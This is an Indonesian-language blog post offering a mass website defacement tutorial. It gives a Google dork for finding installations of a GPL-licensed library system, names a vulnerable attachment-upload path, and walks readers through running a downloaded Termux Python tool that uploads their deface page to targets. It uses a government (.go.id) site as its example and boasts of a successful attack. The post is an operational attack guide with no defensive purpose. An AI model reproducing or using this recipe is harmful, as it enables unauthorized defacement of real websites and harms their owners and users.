Deface File Attachment Upload Repository with Auto Exploiter Tools


Welcome back lagi kalian yang ganteng-ganteng dan cantik-cantik tapi jomblo ehhe :v. Bercanda doang, jangan anggap serius. Dalam postingan kali ini gua mau kasih kalian tools auto deface massal file attachment + auto scan subdo. Tools ini gua dapet di FB nya si Odiq. Ya Odiq, top defacer Zone-D.

Langsung aja ke caranya.

• Bahan-bahan

- HP/PC
- Kuota yang cukup
- Aplikasi termux
- Dork
** intext:"This Software is Released Under GNU GPL License Version 3"
- Exploit
** admin/modules/bibliography/pop_attach.php
- Tools Termuxnya
Link 1
Link 2

• Tutorial

• Kalian download dulu tools diatas, dan jika sudah kalian ekstrak dan simpan dalam satu folder. Seperti gambar dibawah


• Letakkan script deface ext: .txt bersama dalam satu folder tersebut.
• Dorking di google menggunakan dork diatas.
• Jika sudah nemu target, kalian masukkan exploit
Contoh : site.go.id/admin/modules/bibliography/pop_attach.php

site.go.id/[path]/admin/modules/bibliography/pop_attach.php

• Lanjut ke termuxnya, tulis perintah seperti berikut
$ pkg update && pkg upgrade
$ pkg install python2
$ termux-setup-storage
$ cd storage/shared


$ cd Slim (Note: yang ini sesuai dir di HP kalian, karena gua nyimpen di folder Slim. Makanya gua buka dengan menulis seperti itu)
• python2 slim.py duar.txt (duar.txt script deface gua, bisa diganti sesuai script kalian)
• Maka nanti tampilannya akan seperti dibawah dan langsung aja masukin target tadi, tunggu sampe selesai


• Lihat hasilnya di file result.txt


Dan itu hasil gua wkwk.. Kita coba buka berhasil apa gak.. Dan, ternyata berhasil bro..


Ok, sekian postingan kali ini, jangan lupa share ke teman-teman kalian supaya mereka tahu.

Any Problem?? Click

Post a Comment

0 Comments